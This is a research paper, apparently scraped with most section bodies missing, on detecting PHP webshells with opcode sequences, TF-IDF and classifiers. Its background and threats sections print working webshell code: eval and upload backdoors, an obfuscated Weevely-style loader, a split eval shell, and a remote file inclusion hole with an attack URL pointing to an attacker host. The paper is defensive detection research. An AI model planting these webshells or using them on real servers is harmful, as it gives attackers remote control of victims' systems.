Mitigating Webshell Attacks through Machine Learning Techniques
Abstract
:1. Introduction
2. Background
2.1. Webshell
2.2. Webshell Classification
- Simple WebshellA simple webshell refers to a webshell that contains only one line of code. This type of code is used to accept the data submitted by the attacker through the client and perform the corresponding operations. It is the most common form of webshell. A webshell written in PHP is shown in Listing 1.
Listing 1: Simple Webshell. <php @eval(_POST["a"]); ?> In this example, the attacker sends a POST HTTP request, passes the command code through parameter “a”, and executes the malicious operation using the “eval” command. The parameter “a” is also called the password of the webshell. - Upload Function WebshellThe uploading webshell is used as a springboard for multi-function webshell files. Usually, the website will impose certain restrictions on the size or type of files uploaded. The attacker will upload this webshell and then use it to upload a multi-function webshell. The key code for the uploading webshell is in Listing 2.
Listing 2: Upload Function Webshell. <php
if(isset($_POST["upload"])){
@file_put_contents($_POST["path"],$_POST["content"]);
}
?>The webshell can write new files to a specified directory and facilitate latent control. - Multi-Functional WebshellThe multi-function webshell is usually large and feature-rich, providing functions such as operating files, port scanning, command execution, and database operations. Due to the large size of the file, it is usually uploaded to a victim’s server via the upload function webshell.
2.3. Machine Learning
- Supervised LearningThe samples in the training set are tagged data, that is, the classification of each sample is known. The process of the model is to learn the implicit knowledge from the data and predict the samples of the unknown tags. Typical supervised learning algorithms include K-nearest neighbors, support vector machines (SVMs), naïve Bayesian algorithms, and decision tree algorithms. This topic combines webshell detection with machine learning algorithms. Since the webshell file is tagged during training, it is supervised data. Therefore, this topic mainly studies these classification algorithms.
- Unsupervised LearningThe samples in the training set are unlabeled data; that is, the classification to which each sample belongs is unknown. Common models have cluster analysis and so on. In the process of model training, the implicit category information is summarized from the data, which is often used for the preprocessing of unlabeled data, and then the subsequent supervised learning model training follows.
3. Literature on Detection Methods
3.1. Static and Dynamic Detection
3.2. Flow Analysis Detection
3.3. Log Analysis Detection
3.4. Behavior Analysis Detection
3.5. Statistical Analysis
4. Threats
4.1. Plain Webshell
Listing 3: Non-Obfuscated Webshells. |
<php // Example 1 @eval($_POST["passwd"]); // 1st param is the cmd to execute. // Example 2 @$_POST["0"]($_ POST["1"]); // 1st param is cmd to execute and 2nd is the argument. ?> |
4.2. Obfuscated Webshell
Listing 4: Webshell obfuscation. The Weevely webshell. |
<php $fo="UE9"; $bp="TVFt4e" $jsh="HqhdKTsKCqg=="; $un = str_replace("b","","bsbtbrb_brbepblbabcbe"); $bf="CkqBldqmFsKCRf"; $clh = $un("y", "", "ybyasyey64y_ydyeycyodye"); $nbg = $un("ev","","evcevreateve_evfevuevncevtievon"); $ze = $nbg(’’, $clh($un("q", "", $bf.$fo.$bp.$jsh))); $ze(); ?> |
4.3. Split Webshell
Listing 5: Split Webshell. |
<php function func() { return "ev"."al"; } $a = func(); $a(${"_PO"."ST"}["passwd"]); ?> |
4.4. Remote Webshell
Listing 6: Remote Webshell Example. |
<php $filename = $_GET[’page’]; include($filename); ?> |
Listing 7: Webshell Path. |
http://VictimIP//index.php?page=http://attackerIP/webshell.txt |
5. Proposed Solution
- To reduce the interference of webshell confusions and encryption operations on the detection. File detection is transformed into the detection of opcode sequences.
- To extract word frequency features from opcode sequences using a TF-IDF model.
- To apply different machine learning algorithms to detect this dichotomy problem.
5.1. Opcode
<php eval($_POST[CMD]); ?> |
5.2. Data Preprocessing
5.3. Feature Extraction and Representation
5.4. Word Bag and TF-IDF Models
5.5. Model Training and Validation
6. Evaluation
6.1. Experiments
6.2. Impact of Max_Features Value on Results
6.3. Effectiveness of the Approach
7. Conclusions and Future Work
Author Contributions
Funding
Conflicts of Interest
References
- Acunetix. Web Application Vulnerability Report 2019. Available online: https://cdn2.hubspot.net/hubfs/4595665/Acunetix_web_application_vulnerability_report_2019.pdf (accessed on 14 August 2019).
- Dinh Tu, T.; Guang, C.; Xiaojun, G.; Wubin, P. Webshell detection techniques in web applications. In Proceedings of the Fifth International Conference on Computing, Communications and Networking Technologies (ICCCNT), Hefei, China, 11–13 July 2014; pp. 1–7. [Google Scholar] [CrossRef]
- Kim, J.; Yoo, D.; Jang, H.; Jeong, K. WebSHArk 1.0: A Benchmark Collection for Malicious Web Shell Detection. J. Inf. Process. Syst. 2015, 11, 229–238. [Google Scholar] [CrossRef] [Green Version]
- Oleksii, S.; Ahmad, J.; Sharique, S.; Thorsten, H.; Nick, N. No Honor Among Thieves: A Large-Scale Analysis of Malicious Web Shells. In Proceedings of the 25th International Conference on World Wide Web (WWW ’16), Montreal, QC, Canada, 11–15 April 2016; International World Wide Web Conferences Steering Committee: Geneva, Switzerland, 2016; pp. 1021–1032. [Google Scholar] [CrossRef]
- Jing, Y.; Liming, W.; Zhen, X. A Novel Semantic-Aware Approach for Detecting Malicious Web Traffic. In Information and Communications Security; Springer International Publishing: Cham, Switzerland, 2018; pp. 633–645. [Google Scholar]
- RSA. Webshell. Available online: https://www.rsa.com/content/dam/en/solution-brief/asoc-threat-solution-series-webshells.pdf (accessed on 7 June 2019).
- Bradley, L. Comparing supervised and unsupervised category learning. Psychon. Bull. Rev. 2002, 9, 829–835. [Google Scholar] [CrossRef] [Green Version]
- Shelldetector. Available online: https://www.shelldetector.com (accessed on 14 August 2019).
- Zhuohang, L.; Hanbing, Y.; Rui, M. Automatic and Accurate Detection of Webshell Based on Convolutional Neural Network. In Cyber Security; Springer Singapore: Singapore, 2019; pp. 73–85. [Google Scholar]
- Zheng, M.; Rui, M.; Tao, Z.; Weiping, W. Research of Linux WebShell Detection based on SVM Classifier. Netinfo Secur. 2014, 5, 5–9. [Google Scholar]
- Jiankang, H.; Zhen, X.; Duohe, M.; Jing, Y. Research of Webshell Detection Based on Decision Tree. J. Netw. New Media 2012, 6. [Google Scholar]
- Quinlan, J.R. C4.5: Programs for Machine Learning; Morgan Kaufmann Publishers Inc.: San Francisco, CA, USA, 1993. [Google Scholar]
- Ye, F.; Gong, J.; Yang, W. Black box detection of webshell based on support vector machine. J. Netw. New Media 2015, 47, 924–930. [Google Scholar]
- Jia, W.; Hu, R.; Shi, F. Feature Design and Selection Based on Web Application-Oriented Active Threat Awareness Model. In Proceedings of the 2016 Sixth International Conference on Instrumentation Measurement, Computer, Communication and Control (IMCCC), Harbin, China, 21–23 July 2016; pp. 597–600. [Google Scholar] [CrossRef]
- Wenchuan, Y.; Bang, S.; Baojiang, C. A Webshell Detection Technology Based on HTTP Traffic Analysis. In Innovative Mobile and Internet Services in Ubiquitous Computing, Proceedings of the 11th International Conference on Innovative Mobile and Internet Services in Ubiquitous Computing (IMIS-2017); Springer International Publishing: Cham, Switzerland, 2018; pp. 336–342. [Google Scholar]
- Liuyang, S.; Yong, F. Webshell Detection Method Research Based on Web Log. J. Netw. New Media 2016, 2, 11. [Google Scholar]
- Xin, S.; Xindai, L.; Hua, D. A Matrix Decomposition Based Webshell Detection Method. In Proceedings of the 2017 International Conference on Cryptography, Security and Privacy (ICCSP ’17), Wuhan, China, 5 January 2017; ACM: New York, NY, USA, 2017; pp. 66–70. [Google Scholar] [CrossRef]
- Wang, C.; Yang, H.; Zhao, Z.; Gong, L.; Li, Z. The Research and Improvement in the Detection of PHP Variable WebShell based on Information Entropy. J. Comput. 2016, 28, 62–68. [Google Scholar] [CrossRef]
- Wang, Z.; Yang, J.; Dai, M.; Xu, R.; Liang, X. A Method of Detecting Webshell Based on Multi-layer Perception. Acad. J. Comput. Inf. Sci. 2019, 2, 81–91. [Google Scholar] [CrossRef]
- FORENSICS. Neopi. Available online: https://resources.infosecinstitute.com/web-shell-detection (accessed on 14 August 2019).
- Cui, H.; Huang, D.; Fang, Y.; Liu, L.; Huang, C. Webshell Detection Based on Random Forest–Gradient Boosting Decision Tree Algorithm. In Proceedings of the 2018 IEEE Third International Conference on Data Science in Cyberspace (DSC), Guangzhou, China, 18–21 June 2018; pp. 153–160. [Google Scholar] [CrossRef]
- Croix, A.; Debatty, T.; Mees, W. Training a multi-criteria decision system and application to the detection of PHP webshells. In Proceedings of the 2019 International Conference on Military Communications and Information Systems (ICMCIS), Budva, Montenegro, 14–15 May 2019; pp. 1–8. [Google Scholar] [CrossRef]
- Wrench, P.M.; Irwin, B.V.W. Towards a PHP webshell taxonomy using deobfuscation-assisted similarity analysis. In Proceedings of the 2015 Information Security for South Africa (ISSA), Johannesburg, South Africa, 12–13 August 2015; pp. 1–8. [Google Scholar] [CrossRef]
- KALI. Weevely. Available online: https://tools.kali.org/maintaining-access/weevely (accessed on 14 August 2019).
- OWASP. RFI Vulnerability. Available online: https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion (accessed on 14 August 2019).
- Igor, S.; Felix, B.; Javier, N.; Yoseba, P.; Borja, S.; Carlos, L.; Pablo, B. Idea: Opcode-Sequence-Based Malware Detection. In Engineering Secure Software and Systems; Springer: Berlin/Heidelberg, Germany, 2010; pp. 35–43. [Google Scholar]
- php.net. VLD. Available online: http://pecl.php.net/package/vld (accessed on 14 August 2019).
# | OPCODE |
---|---|
1 | FETCH_CONSTANT |
2 | FETCH_R |
3 | FETCH_DIM_R |
4 | INCLUDE_OR_EVAL |
5 | RETURN |
True Class | Predicted Result | |
---|---|---|
Webshell | Normal Page | |
Webshell | True Positive (TP) | False Negative (FN) |
Normal Page | False Positive (FP) | True Negative (TN) |
Method | Accuracy (%) | Precision (%) | Recall (%) | F1 Score (%) |
---|---|---|---|---|
NB-Opcode | 97.4 | 97.2 | 96.8 | 97.0 |
SVM | 96.0 | 94.1 | 95.9 | 95.9 |
RF | 96.1 | 89.0 | 88.2 | 88.6 |
Detector | Version | Accuracy (%) | Precision (%) | Recall (%) | F1 Score (%) |
---|---|---|---|---|---|
NB-Opcode | - | 97.4 | 97.2 | 96.8 | 97.0 |
Webshell Killer | V2.10 | 88.6 | 85.9 | 80.3 | 83.0 |
D-Shield | V2.1.5.2 | 92.4 | 87.9 | 90.6 | 89.2 |
Web Shell Detector | V1.1 by Python | 84.6 | 68.2 | 77.4 | 75.5 |
© 2020 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (http://creativecommons.org/licenses/by/4.0/).
Share and Cite
Guo, Y.; Marco-Gisbert, H.; Keir, P. Mitigating Webshell Attacks through Machine Learning Techniques. Future Internet 2020, 12, 12. https://doi.org/10.3390/fi12010012
Guo Y, Marco-Gisbert H, Keir P. Mitigating Webshell Attacks through Machine Learning Techniques. Future Internet. 2020; 12(1):12. https://doi.org/10.3390/fi12010012
Chicago/Turabian StyleGuo, You, Hector Marco-Gisbert, and Paul Keir. 2020. "Mitigating Webshell Attacks through Machine Learning Techniques" Future Internet 12, no. 1: 12. https://doi.org/10.3390/fi12010012